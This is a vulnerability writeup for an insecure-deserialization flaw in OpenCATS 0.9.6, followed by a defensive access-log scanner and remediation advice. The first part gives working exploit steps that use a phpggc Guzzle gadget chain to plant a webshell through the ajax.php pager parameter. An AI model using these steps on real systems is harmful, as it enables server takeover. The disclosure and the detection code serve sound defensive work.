CVE-2022-43019: opencats_zero-days/RCE_via_deserialisation.md at main · hansmach1ne/opencats_zero-days
OpenCATS v0.9.6 was discovered to contain a remote code execution (RCE) vulnerability via the getDataGridPager’s ajax functionality.
Remote Code Execution via insecure deserialization in OpenCATS getDataGridPager's ajax functionality.

Vulnerable code
How to achieve command execution
Useful information: OpenCATS uses Guzzle, which can be used as a gadget chain.
It is possible to craft the serialized object with the phpggc tool, which has a Guzzle gadget chain predefined.
Create the payload that will be executed. I will use phpinfo().
echo "<?php phpinfo(); ?>" > /tmp/shell.php
Create a serialized payload with phpggc that will upload the malicious shell to the provided directory on the web server.
./phpggc -u --fast-destruct Guzzle/FW1 /var/www/html/opencats/pwned.php /tmp/shell.php
Copy the payload into the 'p' parameter.
/ajax.php?f=getDataGridPager&i=1&p=PAYLOAD_FROM_PREVIOUS_STEP
Execute the webshell.
Ending notes. The upload location might vary from system to system, depending on whether www-data has write permission to the web server's root directory. In case the web server's root is not writable, upload the webshell to '/upload/pwned.php' instead.
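From the defender's side, the request shape described above (a GET to ajax.php with f=getDataGridPager and a URL-encoded PHP-serialized object in the p parameter) is easy to pick out of an access log. The following scanner is an added example written for this page, not code from the OpenCATS project or from the writeup's author. It parses constructed combined-format log lines, percent-decodes the p parameter, and reports any request whose p value carries a serialized PHP object (O:<len>:"<class>":...), listing the class names it finds and flagging the GuzzleHttp namespace because the writeup identifies Guzzle as the gadget chain. The log lines, IP addresses and the GuzzleHttp\Example class name are all constructed sample data; the assumption that a legitimate pager request never needs a serialized object, only scalars or arrays, is the basis for the rule.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined-format access log line: client IP, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP serialized object header: O:<name length>:"<class name>":<prop count>:{
PHP_OBJECT = re.compile(r'O:\d+:"([^"]+)":\d+:\{')

# Constructed sample log. Line 1 is a benign pager call carrying a serialized
# array; lines 2 and 3 carry serialized objects (stdClass and a fake
# GuzzleHttp\Example class); line 4 is unrelated traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /opencats/ajax.php?f=getDataGridPager&i=1&p=a%3A1%3A%7Bs%3A4%3A%22page%22%3Bi%3A2%3B%7D HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2023:10:00:05 +0000] "GET /opencats/ajax.php?f=getDataGridPager&i=1&p=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2023:10:00:07 +0000] "GET /opencats/ajax.php?f=getDataGridPager&i=1&p=O%3A18%3A%22GuzzleHttp%5CExample%22%3A0%3A%7B%7D HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2023:10:00:09 +0000] "GET /opencats/index.php?m=home HTTP/1.1" 200 4096
"""


def inspect_request(path):
    """Return a finding for a getDataGridPager call whose 'p' parameter holds a
    PHP-serialized object, or None if the request does not match the pattern."""
    parts = urlsplit(path)
    if not parts.path.endswith('/ajax.php'):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if query.get('f', [''])[0] != 'getDataGridPager':
        return None
    p_value = query.get('p', [''])[0]
    classes = PHP_OBJECT.findall(p_value)
    if not classes:
        return None  # scalars or serialized arrays only: treated as legitimate
    return {
        'classes': classes,
        # The writeup names Guzzle as the gadget chain, so that namespace is
        # the strongest signal; any other class is still worth a look.
        'guzzle_namespace': any(c.startswith('GuzzleHttp\\') for c in classes),
    }


def scan_log(text):
    """Scan access-log text and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # skip lines that are not in combined format
        hit = inspect_request(match.group('path'))
        if hit:
            findings.append({'ip': match.group('ip'), 'ts': match.group('ts'), **hit})
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        severity = 'HIGH' if finding['guzzle_namespace'] else 'MEDIUM'
        print(f"[{severity}] {finding['ts']} {finding['ip']} classes={finding['classes']}")
```

Two limits are worth knowing when deploying this. It only sees query strings, so the same parameter sent in a POST body needs application-level or proxy logging to be visible, and it does not decode a base64-wrapped or double-encoded value. The durable fix is in the application: never pass request data to unserialize(); decode the pager state with json_decode() or, at minimum, call unserialize() with allowed_classes set to false so no object can be instantiated from user input.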